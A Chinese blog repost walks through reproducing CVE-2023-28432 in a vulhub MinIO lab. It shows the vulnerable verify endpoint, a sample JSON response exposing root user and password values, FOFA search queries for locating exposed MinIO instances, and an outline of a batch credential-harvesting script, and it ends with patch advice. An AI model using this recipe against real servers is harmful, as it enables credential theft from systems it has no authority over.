当前位置: 首页 > news >正文

市民服务中心网站建设网站突然搜不到了

市民服务中心网站建设,网站突然搜不到了,好看的手机端网站开发页面,wordpress更换帝国前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。 0x00 环境配置 …

前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验,我们继续使用P神的Minio的docker环境。启动环境:

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面,另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径:http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据:

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中,我们可以看到MINIO_ROOT_USER字段包含账户名,MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性,写一个批量的脚本文件来检测,并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感,若有需要可以加群下载。
其实脚本比较简单,就是向这个漏洞URL发送请求,判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段,最后对这个JSON数据进行解析,拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。

http://www.yayakq.cn/news/554134/

相关文章:

  • 律师在哪个网站做宁波网站推广人
  • 外汇申报在哪个网站上做建网站书籍
  • 网站怎样才能在百度被搜索到wordpress怎么添加友链
  • 番禺制作网站平台怎样做网站排名优化
  • 新沂建设网站网站建设需要哪些工作室
  • 建永久网站深圳app开发公司排名前十
  • 制作网站学什么软件手机网站页面尺寸大小
  • 网站建设与管理卷子爱奇艺推广联盟
  • 申请永久网站空间网络营销的渠道
  • 帝国cms影视网站模板公司网站手机版设计
  • mediwiki 做网站百度推广登录地址
  • 深圳网站seo教程seo短视频保密路线
  • 网站建设步和客户沟通山西住房与城乡建设部网站
  • 西安谁家的集团门户网站建设比较好公众号运营一年多少钱
  • 北京网站排名优化如何在网站搜关键字
  • 网站平台设计团队网站制作价格服务
  • 成都网站建设与网站制作公司logo设计费用一般多少钱
  • 福州建设银行官网招聘网站东营网站建设服务电话
  • 国外做电商网站有哪些wordpress 下拉框链接
  • 廊坊网站排名优化公司哪家好江苏网站建设哪家有
  • 潍坊制作网站wordpress侧边小工具栏
  • 自动采集更新的网站wordpress上海seo关键字推广
  • 西青网站建设app定制制作价格
  • 热门的网站模板下载装饰公司网站开发
  • 做软件跟做网站哪个难做传销网站的程序员犯法吗
  • 网站建设需求范本山东富泰建设工程有限公司网站
  • 搭建网站需要多少钱电影资源分享网站怎么做的
  • 哪个网站可以做经济模拟题wordpress启用silder
  • 湖南高端建设网站软件商城app下载安装
  • 建设网站项目的目的建什么网站